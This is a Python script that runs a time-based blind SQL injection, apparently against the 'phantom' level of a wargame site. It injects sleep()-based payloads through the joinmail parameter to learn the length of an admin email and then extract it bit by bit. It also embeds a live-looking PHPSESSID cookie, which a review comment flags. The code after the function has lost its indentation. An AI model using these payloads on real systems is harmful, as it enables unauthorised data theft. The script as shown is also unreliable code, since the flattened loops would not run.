import requests
import time
def request(payload):
    """Time one GET request that carries *payload* in ``joinmail``.

    Returns the elapsed wall-clock seconds (float) measured with
    ``time.time()`` around the call to ``requests.get``. The response is
    discarded: the rest of this script reads only the latency, which is the
    side channel a time-based blind SQL injection test depends on.
    """
    began = time.time()

    # NOTE(review): a PHPSESSID value is embedded in the source. Anyone who
    # can read this page can replay it for as long as the session is valid;
    # keep session identifiers out of published code and rotate this one.
    # The URL is plain http://, so the cookie also travels unencrypted.
    session_headers = {'Cookie': 'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    query = {'joinmail': payload}
    target = "http://los.rubiya.kr/phantom_e2e30eaf1c0b3cb61b4b72a932c849fe.php"

    # No timeout= is passed, so this call blocks until the server answers.
    requests.get(target, params=query, headers=session_headers)
    return time.time() - began
length = 0
for i in range(0,100):
payload = "1'),(if(length((select a.email from prob_phantom a where a.no=1))="+str(i)+",sleep(1),1),'5','1')-- x"
if request(payload) > 1:
length = i
break
print "Find Admin Email Length[*] = " + str(length)
admin_email = ""
for i in range(1,length+1):
binary = ""
for j in range(1,9):
payload = "1'),(if(substring(lpad(bin(ord(substring((select a.email from prob_phantom a where a.no=1),"+str(i)+",1))),8,0),"+str(j)+",1)=1,sleep(1),1),'5','1')-- x"
if request(payload) > 1:
binary += "1"
else:
binary += "0"
if binary != "00000000":
admin_email += chr(int(binary,2))
print "Find Admin Email[*] = " + str(admin_email)